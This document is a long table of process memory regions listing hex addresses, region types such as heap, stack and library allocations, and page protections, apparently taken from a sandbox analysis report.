7FFBAA4A8000
|
unkown
|
page readonly
|
||
1F3F4C30000
|
heap
|
page execute and read and write
|
||
1C480000
|
trusted library allocation
|
page read and write
|
||
1F9E0C91000
|
heap
|
page read and write
|
||
7FFB4B28D000
|
trusted library allocation
|
page execute and read and write
|
||
1F9E040C000
|
heap
|
page read and write
|
||
1C000000
|
trusted library allocation
|
page read and write
|
||
1B806000
|
heap
|
page read and write
|
||
10A0000
|
trusted library allocation
|
page read and write
|
||
1B730000
|
trusted library allocation
|
page read and write
|
||
1AF78000
|
heap
|
page read and write
|
||
1BE50000
|
trusted library allocation
|
page read and write
|
||
1C4D0000
|
trusted library allocation
|
page read and write
|
||
1BDF0000
|
trusted library allocation
|
page read and write
|
||
4D4D000
|
stack
|
page read and write
|
||
1F9E02FE000
|
heap
|
page read and write
|
||
1F3F4E2C000
|
heap
|
page read and write
|
||
1C5A3000
|
trusted library allocation
|
page read and write
|
||
1F9E0CB8000
|
heap
|
page read and write
|
||
28D0000
|
trusted library allocation
|
page read and write
|
||
1B360000
|
trusted library allocation
|
page read and write
|
||
7FFB4B432000
|
trusted library allocation
|
page read and write
|
||
1F9E0CD0000
|
heap
|
page read and write
|
||
7FFB4B5E0000
|
trusted library allocation
|
page read and write
|
||
1F9E0D10000
|
heap
|
page read and write
|
||
1F9E0CE8000
|
heap
|
page read and write
|
||
1C4B0000
|
trusted library allocation
|
page read and write
|
||
1B5BD000
|
heap
|
page read and write
|
||
DEB000
|
heap
|
page read and write
|
||
1F9E0CB0000
|
heap
|
page read and write
|
||
1F9E0D18000
|
heap
|
page read and write
|
||
1F9E0CB8000
|
heap
|
page read and write
|
||
7FFB4B410000
|
trusted library allocation
|
page read and write
|
||
1BFE0000
|
trusted library allocation
|
page read and write
|
||
1F9E09E5000
|
unkown
|
page read and write
|
||
1BEB0000
|
trusted library allocation
|
page read and write
|
||
872B9BE000
|
stack
|
page read and write
|
||
7FF7F0845000
|
direct allocation
|
page execute and read and write
|
||
1F3DE220000
|
trusted library allocation
|
page read and write
|
||
1B6E3000
|
trusted library allocation
|
page read and write
|
||
7FF63D3FB000
|
unkown
|
page write copy
|
||
1C510000
|
trusted library allocation
|
page read and write
|
||
1F9DE0BC000
|
heap
|
page read and write
|
||
1F9E0CD0000
|
heap
|
page read and write
|
||
1F9E0CB8000
|
heap
|
page read and write
|
||
1F9E041E000
|
heap
|
page read and write
|
||
7FFB4B262000
|
trusted library allocation
|
page read and write
|
||
1B6F0000
|
trusted library allocation
|
page read and write
|
||
7DF43B4E6000
|
unkown
|
page read and write
|
||
1BA00000
|
trusted library allocation
|
page read and write
|
||
1C2D0000
|
trusted library allocation
|
page read and write
|
||
7FF7F0501000
|
direct allocation
|
page execute and read and write
|
||
1F9E0423000
|
heap
|
page read and write
|
||
1BDC4750000
|
trusted library allocation
|
page read and write
|
||
1F9E0CE8000
|
heap
|
page read and write
|
||
1BFA0000
|
trusted library allocation
|
page read and write
|
||
1BFE0000
|
trusted library allocation
|
page read and write
|
||
1C3F0000
|
trusted library allocation
|
page read and write
|
||
1F9E0CF8000
|
heap
|
page read and write
|
||
1F9E0C91000
|
heap
|
page read and write
|
||
872B4FE000
|
stack
|
page read and write
|
||
2A4AD000000
|
heap
|
page read and write
|
||
1C460000
|
trusted library allocation
|
page read and write
|
||
1F9E0CB0000
|
heap
|
page read and write
|
||
1F9E0CD0000
|
heap
|
page read and write
|
||
7FFB4B700000
|
trusted library allocation
|
page read and write
|
||
1F9E0E8A000
|
heap
|
page read and write
|
||
7FFB4B570000
|
trusted library allocation
|
page read and write
|
||
1F9E0D28000
|
heap
|
page read and write
|
||
1F9E0E8A000
|
heap
|
page read and write
|
||
1B6E0000
|
trusted library allocation
|
page read and write
|
||
1B710000
|
trusted library allocation
|
page read and write
|
||
1F3F4BBF000
|
heap
|
page read and write
|
||
1B3D0000
|
heap
|
page execute and read and write
|
||
7FFBAA431000
|
unkown
|
page execute read
|
||
116B000
|
heap
|
page read and write
|
||
1C3AF000
|
trusted library allocation
|
page read and write
|
||
2212EE79000
|
heap
|
page read and write
|
||
1BFF0000
|
trusted library allocation
|
page read and write
|
||
5416000
|
heap
|
page read and write
|
||
1B5C4000
|
heap
|
page read and write
|
||
1AA3FF00000
|
heap
|
page readonly
|
||
1F9E0E8A000
|
heap
|
page read and write
|
||
1C4D0000
|
trusted library allocation
|
page read and write
|
||
2ECB000
|
trusted library allocation
|
page read and write
|
||
1F9E0CC5000
|
heap
|
page read and write
|
||
3C0464E000
|
stack
|
page read and write
|
||
1B3E0000
|
trusted library allocation
|
page read and write
|
||
7FFB4B590000
|
trusted library allocation
|
page read and write
|
||
872B7BF000
|
stack
|
page read and write
|
||
7FFB4B680000
|
trusted library allocation
|
page read and write
|
||
1F9E0CD0000
|
heap
|
page read and write
|
||
1B310000
|
trusted library allocation
|
page read and write
|
||
1F9E0CA0000
|
heap
|
page read and write
|
||
3C03AFE000
|
stack
|
page read and write
|
||
1B5CE000
|
heap
|
page read and write
|
||
7FF63D221000
|
unkown
|
page execute read
|
||
1F3DD770000
|
trusted library allocation
|
page read and write
|
||
1F9E042D000
|
heap
|
page read and write
|
||
1F9E0CB0000
|
heap
|
page read and write
|
||
1B490000
|
trusted library allocation
|
page read and write
|
||
1F9E0D70000
|
heap
|
page read and write
|
||
1B300000
|
trusted library allocation
|
page read and write
|
||
7FFB4B263000
|
trusted library allocation
|
page execute and read and write
|
||
24D916A6000
|
heap
|
page read and write
|
||
D2E000
|
heap
|
page read and write
|
||
1AA41980000
|
heap
|
page read and write
|
||
1F9E0453000
|
heap
|
page read and write
|
||
1F9E0E8A000
|
heap
|
page read and write
|
||
1AA40150000
|
heap
|
page read and write
|
||
1F9E0CE0000
|
heap
|
page read and write
|
||
1B549000
|
heap
|
page read and write
|
||
BC0000
|
heap
|
page read and write
|
||
1F9E03FC000
|
heap
|
page read and write
|
||
1F9E0CE8000
|
heap
|
page read and write
|
||
7FFB4B326000
|
trusted library allocation
|
page read and write
|
||
1BDD4A6F000
|
trusted library allocation
|
page read and write
|
||
1BE80000
|
trusted library allocation
|
page read and write
|
||
7FFB4B4B0000
|
trusted library allocation
|
page read and write
|
||
1C350000
|
trusted library allocation
|
page read and write
|
||
53FA000
|
heap
|
page read and write
|
||
2EA5000
|
trusted library allocation
|
page read and write
|
||
1C460000
|
trusted library allocation
|
page read and write
|
||
1C356000
|
unkown
|
page read and write
|
||
1B303000
|
trusted library allocation
|
page read and write
|
||
7FFB4B440000
|
trusted library allocation
|
page read and write
|
||
1B6E3000
|
trusted library allocation
|
page read and write
|
||
1B6E0000
|
trusted library allocation
|
page read and write
|
||
7FFB4B250000
|
trusted library allocation
|
page read and write
|
||
1BE30000
|
trusted library allocation
|
page read and write
|
||
1F9E0CA1000
|
heap
|
page read and write
|
||
1F9E0E8A000
|
heap
|
page read and write
|
||
1F9E0CB8000
|
heap
|
page read and write
|
||
1BE80000
|
trusted library allocation
|
page read and write
|
||
1B680000
|
trusted library allocation
|
page read and write
|
||
1F9E043B000
|
heap
|
page read and write
|
||
1F9E0CB0000
|
heap
|
page read and write
|
||
1F9E0CE8000
|
heap
|
page read and write
|
||
1B313000
|
trusted library allocation
|
page read and write
|
||
1BE60000
|
trusted library allocation
|
page read and write
|
||
1B180000
|
trusted library allocation
|
page read and write
|
||
2403AB46000
|
heap
|
page read and write
|
||
1F3DAD90000
|
trusted library allocation
|
page read and write
|
||
1AA41EB4000
|
heap
|
page read and write
|
||
61FF000
|
stack
|
page read and write
|
||
1BFF0000
|
trusted library allocation
|
page read and write
|
||
1BE50000
|
trusted library allocation
|
page read and write
|
||
24023E54000
|
trusted library allocation
|
page read and write
|
||
1BD60000
|
trusted library allocation
|
page read and write
|
||
1B303000
|
trusted library allocation
|
page read and write
|
||
1B811000
|
heap
|
page read and write
|
||
1B4AF000
|
trusted library allocation
|
page read and write
|
||
1C0D0000
|
trusted library allocation
|
page read and write
|
||
1F9E0E8A000
|
heap
|
page read and write
|
||
1F9E0E8A000
|
heap
|
page read and write
|
||
1F9E0E8A000
|
heap
|
page read and write
|
||
21F3000
|
heap
|
page read and write
|
||
1B7FE000
|
heap
|
page read and write
|
||
1BDDCFA0000
|
heap
|
page read and write
|
||
3C045CE000
|
stack
|
page read and write
|
||
1C0A7000
|
trusted library allocation
|
page read and write
|
||
1F9E0CE8000
|
heap
|
page read and write
|
||
1BDD4D57000
|
trusted library allocation
|
page read and write
|
||
1B4AA000
|
trusted library allocation
|
page read and write
|
||
DFB000
|
stack
|
page read and write
|
||
1BE60000
|
trusted library allocation
|
page read and write
|
||
1B300000
|
trusted library allocation
|
page read and write
|
||
1C400000
|
trusted library allocation
|
page read and write
|
||
2E22000
|
trusted library allocation
|
page read and write
|
||
1AA41EB4000
|
heap
|
page read and write
|
||
992000
|
stack
|
page read and write
|
||
1F9E0CC8000
|
heap
|
page read and write
|
||
1F9E0416000
|
heap
|
page read and write
|
||
1F9E0885000
|
heap
|
page read and write
|
||
22FB000
|
heap
|
page read and write
|
||
1F9E0D30000
|
heap
|
page read and write
|
||
1C138000
|
trusted library allocation
|
page read and write
|
||
1C470000
|
trusted library allocation
|
page read and write
|
||
1F9E0CD0000
|
heap
|
page read and write
|
||
1BDC6213000
|
trusted library allocation
|
page read and write
|
||
1C430000
|
trusted library allocation
|
page read and write
|
||
1AEB4000
|
heap
|
page read and write
|
||
1F9E0CD0000
|
heap
|
page read and write
|
||
1F9E0453000
|
heap
|
page read and write
|
||
1C090000
|
trusted library allocation
|
page read and write
|
||
1BFE0000
|
trusted library allocation
|
page read and write
|
||
BF14CFE000
|
stack
|
page read and write
|
||
240220A5000
|
heap
|
page read and write
|
||
1F9E0E8A000
|
heap
|
page read and write
|
||
1BD30000
|
trusted library allocation
|
page read and write
|
||
1B6E3000
|
trusted library allocation
|
page read and write
|
||
1B6E3000
|
trusted library allocation
|
page read and write
|
||
1BD70000
|
trusted library allocation
|
page read and write
|
||
1B6E3000
|
trusted library allocation
|
page read and write
|
||
1B670000
|
trusted library allocation
|
page read and write
|
||
1F9E0E8A000
|
heap
|
page read and write
|
||
1F9E0CB0000
|
heap
|
page read and write
|
||
2403A7E1000
|
heap
|
page read and write
|
||
1BDC6106000
|
trusted library allocation
|
page read and write
|
||
1B7FB000
|
heap
|
page read and write
|
||
1F9E0E8A000
|
heap
|
page read and write
|
||
7FFB4B2F6000
|
trusted library allocation
|
page read and write
|
||
1B5EA000
|
heap
|
page read and write
|
||
1BDC0000
|
trusted library allocation
|
page read and write
|
||
1F9E0CF8000
|
heap
|
page read and write
|
||
1F9E0E8A000
|
heap
|
page read and write
|
||
1B4BE000
|
heap
|
page read and write
|
||
1F3DC7C1000
|
trusted library allocation
|
page read and write
|
||
7FFB4B6A0000
|
trusted library allocation
|
page read and write
|
||
7FFB4B640000
|
trusted library allocation
|
page read and write
|
||
1F9E0CB8000
|
heap
|
page read and write
|
||
1B370000
|
trusted library allocation
|
page read and write
|
||
1F9E0CB8000
|
heap
|
page read and write
|
||
1F9E0CB8000
|
heap
|
page read and write
|
||
1B6E0000
|
trusted library allocation
|
page read and write
|
||
170000
|
heap
|
page read and write
|
||
1B570000
|
trusted library allocation
|
page read and write
|
||
1B6E3000
|
trusted library allocation
|
page read and write
|
||
2A4ACB99000
|
unkown
|
page read and write
|
||
1B6E3000
|
trusted library allocation
|
page read and write
|
||
1AF79000
|
heap
|
page read and write
|
||
1B6E3000
|
trusted library allocation
|
page read and write
|
||
1BE50000
|
trusted library allocation
|
page read and write
|
||
1F9E0CE0000
|
heap
|
page read and write
|
||
231A88F5000
|
heap
|
page read and write
|
||
1BD90000
|
trusted library allocation
|
page read and write
|
||
872B8B8000
|
stack
|
page read and write
|
||
1C4C3000
|
trusted library allocation
|
page read and write
|
||
7FFB4B4D0000
|
trusted library allocation
|
page read and write
|
||
1F3F5223000
|
heap
|
page read and write
|
||
7FFB4B5AC000
|
trusted library allocation
|
page read and write
|
||
90000
|
heap
|
page read and write
|
||
1F9E0E8A000
|
heap
|
page read and write
|
||
1F9E0CD0000
|
heap
|
page read and write
|
||
1B6E3000
|
trusted library allocation
|
page read and write
|
||
1F9E0D10000
|
heap
|
page read and write
|
||
1B510000
|
heap
|
page read and write
|
||
1B520000
|
trusted library allocation
|
page read and write
|
||
1F9E0D18000
|
heap
|
page read and write
|
||
1AA3FF20000
|
direct allocation
|
page execute and read and write
|
||
1F9E0E8A000
|
heap
|
page read and write
|
||
1BDFF000
|
trusted library allocation
|
page read and write
|
||
1F9E0E8B000
|
heap
|
page read and write
|
||
1F9E0D10000
|
heap
|
page read and write
|
||
1F9E0CC8000
|
heap
|
page read and write
|
||
1B6E0000
|
trusted library allocation
|
page read and write
|
||
5800000
|
trusted library allocation
|
page read and write
|
||
1BDC4AEA000
|
trusted library allocation
|
page read and write
|
||
1B6E3000
|
trusted library allocation
|
page read and write
|
||
1F9E0CD0000
|
heap
|
page read and write
|
||
2A4ACD90000
|
heap
|
page read and write
|
||
7FFB4B4F0000
|
trusted library allocation
|
page read and write
|
||
1F9DF9D0000
|
trusted library allocation
|
page read and write
|
||
1F3F4F14000
|
heap
|
page read and write
|
||
1B740000
|
trusted library allocation
|
page read and write
|
||
1F9E0CD0000
|
heap
|
page read and write
|
||
1F9E0CC8000
|
heap
|
page read and write
|
||
1F9E0CD0000
|
heap
|
page read and write
|
||
1F3DAB60000
|
heap
|
page read and write
|
||
7FFB4B560000
|
trusted library allocation
|
page read and write
|
||
1AA4199A000
|
heap
|
page read and write
|
||
1B3DC000
|
heap
|
page execute and read and write
|
||
872C68A000
|
stack
|
page read and write
|
||
1C1C0000
|
trusted library allocation
|
page read and write
|
||
240206D2000
|
heap
|
page read and write
|
||
7FFB4B6D0000
|
trusted library allocation
|
page read and write
|
||
1F9E0CB8000
|
heap
|
page read and write
|
||
1F9E0CD0000
|
heap
|
page read and write
|
||
BF089FF000
|
stack
|
page read and write
|
||
1BE50000
|
trusted library allocation
|
page read and write
|
||
1B350000
|
trusted library allocation
|
page read and write
|
||
1C2E0000
|
trusted library allocation
|
page read and write
|
||
DC5000
|
heap
|
page read and write
|
||
24D916AA000
|
heap
|
page read and write
|
||
2E26000
|
trusted library allocation
|
page read and write
|
||
1C1D0000
|
trusted library allocation
|
page read and write
|
||
1BE50000
|
trusted library allocation
|
page read and write
|
||
5433000
|
heap
|
page read and write
|
||
1AA3FFA8000
|
heap
|
page read and write
|
||
1B310000
|
trusted library allocation
|
page read and write
|
||
BF088FE000
|
stack
|
page read and write
|
||
1B496000
|
heap
|
page read and write
|
||
2A4ACDBF000
|
heap
|
page read and write
|
||
7FFB4B6D0000
|
trusted library allocation
|
page read and write
|
||
7FFB4B294000
|
trusted library allocation
|
page read and write
|
||
1BDE0000
|
trusted library allocation
|
page read and write
|
||
7DF43B4E0000
|
unkown
|
page read and write
|
||
1F9E0D00000
|
heap
|
page read and write
|
||
1F9E0CB8000
|
heap
|
page read and write
|
||
1C430000
|
trusted library allocation
|
page read and write
|
||
1BE50000
|
trusted library allocation
|
page read and write
|
||
7FF63D3FF000
|
unkown
|
page readonly
|
||
1B6E3000
|
trusted library allocation
|
page read and write
|
||
53A9000
|
heap
|
page read and write
|
||
2402348A000
|
trusted library allocation
|
page read and write
|
||
1F9E06CD000
|
heap
|
page read and write
|
||
401000
|
unkown
|
page execute read
|
||
1F9E0CC8000
|
heap
|
page read and write
|
||
1AA3FDAC000
|
unkown
|
page read and write
|
||
1BDAD000
|
trusted library allocation
|
page read and write
|
||
1F9E0CB0000
|
heap
|
page read and write
|
||
1BE60000
|
trusted library allocation
|
page read and write
|
||
2403A6F0000
|
heap
|
page read and write
|
||
1AF45000
|
heap
|
page read and write
|
||
872BA3E000
|
stack
|
page read and write
|
||
1C410000
|
trusted library allocation
|
page read and write
|
||
1F9E0CE0000
|
heap
|
page read and write
|
||
22130821000
|
heap
|
page read and write
|
||
2B78000
|
trusted library allocation
|
page read and write
|
||
BF0944E000
|
stack
|
page read and write
|
||
53BD000
|
heap
|
page read and write
|
||
7FF63D3FF000
|
unkown
|
page readonly
|
||
1C000000
|
trusted library allocation
|
page read and write
|
||
1F9E0E8A000
|
heap
|
page read and write
|
||
1BDC2DDD000
|
heap
|
page read and write
|
||
7FFB4B4B0000
|
trusted library allocation
|
page read and write
|
||
DD7000
|
heap
|
page read and write
|
||
735000
|
unkown
|
page read and write
|
||
1C2F0000
|
trusted library allocation
|
page read and write
|
||
2EC2000
|
trusted library allocation
|
page read and write
|
||
7DF4AA0E0000
|
trusted library allocation
|
page execute and read and write
|
||
38CF000
|
stack
|
page read and write
|
||
1F9E0CC8000
|
heap
|
page read and write
|
||
1F9E042A000
|
heap
|
page read and write
|
||
1260000
|
heap
|
page read and write
|
||
1C520000
|
trusted library allocation
|
page read and write
|
||
7FFB4B500000
|
trusted library allocation
|
page read and write
|
||
C74000
|
heap
|
page read and write
|
||
1BEA0000
|
trusted library allocation
|
page read and write
|
||
24023003000
|
trusted library allocation
|
page read and write
|
||
2775000
|
heap
|
page read and write
|
||
1F9E0CA0000
|
heap
|
page read and write
|
||
1F3F4EE1000
|
heap
|
page read and write
|
||
1F9E0CB8000
|
heap
|
page read and write
|
||
1AA3FF4F000
|
unkown
|
page read and write
|
||
7FFB4B283000
|
trusted library allocation
|
page execute and read and write
|
||
1BE90000
|
trusted library allocation
|
page read and write
|
||
1C420000
|
trusted library allocation
|
page read and write
|
||
1B6E3000
|
trusted library allocation
|
page read and write
|
||
7FFB4B410000
|
trusted library allocation
|
page execute and read and write
|
||
1F9E0CA0000
|
heap
|
page read and write
|
||
872B47E000
|
stack
|
page read and write
|
||
231A8750000
|
heap
|
page read and write
|
||
1BF5F000
|
stack
|
page read and write
|
||
1B750000
|
trusted library allocation
|
page read and write
|
||
1BE51000
|
trusted library allocation
|
page read and write
|
||
1F9E0CB8000
|
heap
|
page read and write
|
||
1BE53000
|
trusted library allocation
|
page read and write
|
||
1C4C0000
|
trusted library allocation
|
page read and write
|
||
1F9E0D00000
|
heap
|
page read and write
|
||
24AA000
|
heap
|
page read and write
|
||
1BF90000
|
trusted library allocation
|
page read and write
|
||
1F3DE296000
|
trusted library allocation
|
page read and write
|
||
1F3DE267000
|
trusted library allocation
|
page read and write
|
||
7FFB4B510000
|
trusted library allocation
|
page read and write
|
||
1F9E0CF8000
|
heap
|
page read and write
|
||
1F9DF9D0000
|
direct allocation
|
page execute and read and write
|
||
897000
|
unkown
|
page read and write
|
||
1B6E0000
|
trusted library allocation
|
page read and write
|
||
1B6E3000
|
trusted library allocation
|
page read and write
|
||
7FFB4B300000
|
trusted library allocation
|
page execute and read and write
|
||
1C01E000
|
stack
|
page read and write
|
||
BF084FE000
|
stack
|
page read and write
|
||
1F9E0E8A000
|
heap
|
page read and write
|
||
231A8870000
|
heap
|
page read and write
|
||
7FFBAA47F000
|
unkown
|
page read and write
|
||
1F9E0CC8000
|
heap
|
page read and write
|
||
2403AA03000
|
heap
|
page read and write
|
||
1F9E0E8A000
|
heap
|
page read and write
|
||
1F9E0CB8000
|
heap
|
page read and write
|
||
1BF10000
|
trusted library allocation
|
page read and write
|
||
1F3F4B00000
|
heap
|
page read and write
|
||
89D000
|
unkown
|
page write copy
|
||
1F9E0D28000
|
heap
|
page read and write
|
||
E8E000
|
heap
|
page read and write
|
||
1B6E0000
|
trusted library allocation
|
page read and write
|
||
1C410000
|
trusted library allocation
|
page read and write
|
||
1F9E0D40000
|
heap
|
page read and write
|
||
1C3C0000
|
trusted library allocation
|
page read and write
|
||
1B6E0000
|
trusted library allocation
|
page read and write
|
||
1F9E0D60000
|
heap
|
page read and write
|
||
1F9E0E8A000
|
heap
|
page read and write
|
||
2401000
|
heap
|
page read and write
|
||
1C406000
|
trusted library allocation
|
page read and write
|
||
1BE70000
|
trusted library allocation
|
page read and write
|
||
1C450000
|
trusted library allocation
|
page read and write
|
||
1F9E0E8D000
|
heap
|
page read and write
|
||
7FFB4B550000
|
trusted library allocation
|
page read and write
|
||
1BE53000
|
trusted library allocation
|
page read and write
|
||
24023D0A000
|
trusted library allocation
|
page read and write
|
||
240240E1000
|
trusted library allocation
|
page read and write
|
||
1C1AE000
|
stack
|
page read and write
|
||
1F9E0D10000
|
heap
|
page read and write
|
||
1F9E0CE0000
|
heap
|
page read and write
|
||
CF8000
|
heap
|
page read and write
|
||
7DF424640000
|
trusted library allocation
|
page execute and read and write
|
||
1F9E0CB8000
|
heap
|
page read and write
|
||
24022030000
|
trusted library allocation
|
page read and write
|
||
7FFB4B427000
|
trusted library allocation
|
page read and write
|
||
1F9E0CE8000
|
heap
|
page read and write
|
||
1F9E0CD0000
|
heap
|
page read and write
|
||
1C0A0000
|
trusted library allocation
|
page read and write
|
||
778000
|
heap
|
page read and write
|
||
1F9E0470000
|
unkown
|
page read and write
|
||
1F9E0CB0000
|
heap
|
page read and write
|
||
1C4A0000
|
trusted library allocation
|
page read and write
|
||
1F9E05E4000
|
unkown
|
page read and write
|
||
1F9E0CB0000
|
heap
|
page read and write
|
||
1F9E0D18000
|
heap
|
page read and write
|
||
1B040000
|
trusted library section
|
page read and write
|
||
2E16000
|
trusted library allocation
|
page read and write
|
||
1B6E3000
|
trusted library allocation
|
page read and write
|
||
1B6E3000
|
trusted library allocation
|
page read and write
|
||
1F3F4F6E000
|
heap
|
page read and write
|
||
7FFB4B260000
|
trusted library allocation
|
page read and write
|
||
1F3DC5CD000
|
heap
|
page read and write
|
||
D82000
|
heap
|
page read and write
|
||
7FF63D221000
|
unkown
|
page execute read
|
||
1AA3FFD3000
|
heap
|
page read and write
|
||
1BE60000
|
trusted library allocation
|
page read and write
|
||
24020782000
|
heap
|
page read and write
|
||
BF08479000
|
stack
|
page read and write
|
||
1F3DACD0000
|
trusted library section
|
page read and write
|
||
D4D000
|
heap
|
page read and write
|
||
1F9E0E8A000
|
heap
|
page read and write
|
||
7FFB4B5D8000
|
trusted library allocation
|
page read and write
|
||
1BE50000
|
trusted library allocation
|
page read and write
|
||
1B6E0000
|
trusted library allocation
|
page read and write
|
||
1AA3FF10000
|
trusted library allocation
|
page read and write
|
||
1F3F4F10000
|
heap
|
page read and write
|
||
1F3ECAC5000
|
trusted library allocation
|
page read and write
|
||
28E0000
|
trusted library allocation
|
page read and write
|
||
7FFB4B29C000
|
trusted library allocation
|
page execute and read and write
|
||
1F9E0CC8000
|
heap
|
page read and write
|
||
1F9E01F7000
|
heap
|
page read and write
|
||
1B6E3000
|
trusted library allocation
|
page read and write
|
||
2A4ACBAF000
|
unkown
|
page execute and read and write
|
||
1F9E0CF8000
|
heap
|
page read and write
|
||
1F3F4F46000
|
heap
|
page read and write
|
||
2553000
|
heap
|
page read and write
|
||
1BE20000
|
trusted library allocation
|
page read and write
|
||
1F9E0CE0000
|
heap
|
page read and write
|
||
7FFB4B31C000
|
trusted library allocation
|
page execute and read and write
|
||
155E000
|
stack
|
page read and write
|
||
7FFB4B421000
|
trusted library allocation
|
page read and write
|
||
1F9E0470000
|
unkown
|
page read and write
|
||
1BEB0000
|
trusted library allocation
|
page read and write
|
||
1F9DE087000
|
heap
|
page read and write
|
||
1F9E0E8A000
|
heap
|
page read and write
|
||
1B6E0000
|
trusted library allocation
|
page read and write
|
||
2B6F000
|
stack
|
page read and write
|
||
1B6E0000
|
trusted library allocation
|
page read and write
|
||
2770000
|
heap
|
page read and write
|
||
1C556000
|
trusted library allocation
|
page read and write
|
||
1F9E03B2000
|
heap
|
page read and write
|
||
1F9E0E8A000
|
heap
|
page read and write
|
||
1BDC2DBD000
|
heap
|
page read and write
|
||
1BFE0000
|
trusted library allocation
|
page read and write
|
||
28CC000
|
trusted library allocation
|
page read and write
|
||
1B6E0000
|
trusted library allocation
|
page read and write
|
||
1B320000
|
trusted library allocation
|
page read and write
|
||
1B190000
|
trusted library allocation
|
page read and write
|
||
1F9E0D48000
|
heap
|
page read and write
|
||
1AA3FFEC000
|
heap
|
page read and write
|
||
1F9E0D30000
|
heap
|
page read and write
|
||
1BE50000
|
trusted library allocation
|
page read and write
|
||
7FFB4B6B0000
|
trusted library allocation
|
page read and write
|
||
24032593000
|
trusted library allocation
|
page read and write
|
||
7FFB4B273000
|
trusted library allocation
|
page execute and read and write
|
||
1B5C6000
|
heap
|
page read and write
|
||
2212EE40000
|
heap
|
page read and write
|
||
1C178000
|
unkown
|
page read and write
|
||
2B88000
|
trusted library allocation
|
page read and write
|
||
1F3DAD54000
|
heap
|
page read and write
|
||
1BE60000
|
trusted library allocation
|
page read and write
|
||
1B6E0000
|
trusted library allocation
|
page read and write
|
||
1F9E044B000
|
heap
|
page read and write
|
||
1F3DC9E9000
|
trusted library allocation
|
page read and write
|
||
1F9E0E8A000
|
heap
|
page read and write
|
||
1B303000
|
trusted library allocation
|
page read and write
|
||
895000
|
unkown
|
page readonly
|
||
1C1C0000
|
trusted library allocation
|
page read and write
|
||
4DE0000
|
heap
|
page read and write
|
||
1B310000
|
trusted library allocation
|
page read and write
|
||
7FFB4B5A0000
|
trusted library allocation
|
page read and write
|
||
2402070B000
|
heap
|
page read and write
|
||
1F9E0CE0000
|
heap
|
page read and write
|
||
1B300000
|
trusted library allocation
|
page read and write
|
||
2403A9B0000
|
heap
|
page read and write
|
||
7FFB4B670000
|
trusted library allocation
|
page read and write
|
||
2212EE20000
|
heap
|
page read and write
|
||
1AA3FD99000
|
unkown
|
page read and write
|
||
1F9E0CE8000
|
heap
|
page read and write
|
||
1F9E0750000
|
unkown
|
page read and write
|
||
1F9E0CE0000
|
heap
|
page read and write
|
||
1F9E0CB0000
|
heap
|
page read and write
|
||
1B580000
|
trusted library allocation
|
page read and write
|
||
1F9E043B000
|
heap
|
page read and write
|
||
53BB000
|
heap
|
page read and write
|
||
897000
|
unkown
|
page write copy
|
||
1F9E0530000
|
unkown
|
page read and write
|
||
1F9E01B4000
|
heap
|
page read and write
|
||
7FFB4B422000
|
trusted library allocation
|
page read and write
|
||
7FFB4B243000
|
trusted library allocation
|
page execute and read and write
|
||
750000
|
heap
|
page read and write
|
||
1B6E0000
|
trusted library allocation
|
page read and write
|
||
1B310000
|
trusted library allocation
|
page read and write
|
||
54E0000
|
heap
|
page read and write
|
||
1C400000
|
trusted library allocation
|
page read and write
|
||
28E0000
|
trusted library allocation
|
page read and write
|
||
7FFB4B470000
|
trusted library allocation
|
page read and write
|
||
1BE00000
|
trusted library allocation
|
page read and write
|
||
1BE10000
|
trusted library allocation
|
page read and write
|
||
1F3DABA0000
|
heap
|
page read and write
|
||
24024136000
|
trusted library allocation
|
page read and write
|
||
1F9E0D18000
|
heap
|
page read and write
|
||
1BE50000
|
trusted library allocation
|
page read and write
|
||
1B6E3000
|
trusted library allocation
|
page read and write
|
||
C14000
|
heap
|
page read and write
|
||
1BDC46D0000
|
heap
|
page readonly
|
||
28D0000
|
trusted library allocation
|
page read and write
|
||
1BE50000
|
trusted library allocation
|
page read and write
|
||
12901000
|
trusted library allocation
|
page read and write
|
||
10B0000
|
heap
|
page read and write
|
||
7FFB4B470000
|
trusted library allocation
|
page read and write
|
||
CD0000
|
heap
|
page read and write
|
||
24020747000
|
heap
|
page read and write
|
||
2403AB80000
|
heap
|
page read and write
|
||
1BD50000
|
trusted library allocation
|
page read and write
|
||
1B6E0000
|
trusted library allocation
|
page read and write
|
||
1B310000
|
trusted library allocation
|
page read and write
|
||
1B6E3000
|
trusted library allocation
|
page read and write
|
||
7FFB4B250000
|
trusted library allocation
|
page read and write
|
||
DCD000
|
heap
|
page read and write
|
||
1F3F4CA0000
|
heap
|
page read and write
|
||
1B6E0000
|
trusted library allocation
|
page read and write
|
||
1B6E0000
|
trusted library allocation
|
page read and write
|
||
1F9E0CB8000
|
heap
|
page read and write
|
||
1F9E0CD0000
|
heap
|
page read and write
|
||
2A4ACD60000
|
heap
|
page readonly
|
||
2402074D000
|
heap
|
page read and write
|
||
1B6DE000
|
stack
|
page read and write
|
||
291C000
|
trusted library allocation
|
page read and write
|
||
22130924000
|
heap
|
page read and write
|
||
1F9E0202000
|
heap
|
page read and write
|
||
1B5C7000
|
heap
|
page read and write
|
||
BF0857A000
|
stack
|
page read and write
|
||
1B6E3000
|
trusted library allocation
|
page read and write
|
||
1B3C0000
|
trusted library allocation
|
page read and write
|
||
15DF000
|
stack
|
page read and write
|
||
1F9E0CC8000
|
heap
|
page read and write
|
||
7FFB4B400000
|
trusted library allocation
|
page execute and read and write
|
||
28F0000
|
heap
|
page read and write
|
||
1F9E0CD0000
|
heap
|
page read and write
|
||
1F9E0D28000
|
heap
|
page read and write
|
||
2760000
|
trusted library section
|
page read and write
|
||
1F9E0E8A000
|
heap
|
page read and write
|
||
1F9E0D28000
|
heap
|
page read and write
|
||
1F9E0E8A000
|
heap
|
page read and write
|
||
DCF000
|
heap
|
page read and write
|
||
1070000
|
heap
|
page read and write
|
||
1F9E01FE000
|
heap
|
page read and write
|
||
7FFB4B6C0000
|
trusted library allocation
|
page read and write
|
||
53A5000
|
heap
|
page read and write
|
||
DC1000
|
heap
|
page read and write
|
||
7FFB4B242000
|
trusted library allocation
|
page read and write
|
||
67FC000
|
stack
|
page read and write
|
||
ECA000
|
heap
|
page read and write
|
||
1F9E0CB8000
|
heap
|
page read and write
|
||
1F9E0E8A000
|
heap
|
page read and write
|
||
1F9E0CD0000
|
heap
|
page read and write
|
||
1AA3FFE2000
|
heap
|
page read and write
|
||
1BDC4900000
|
heap
|
page read and write
|
||
1F9E0CB0000
|
heap
|
page read and write
|
||
1F9E0CB0000
|
heap
|
page read and write
|
||
1F9E042A000
|
heap
|
page read and write
|
||
1BE80000
|
trusted library allocation
|
page read and write
|
||
1B6F0000
|
trusted library allocation
|
page read and write
|
||
1F9E0E8A000
|
heap
|
page read and write
|
||
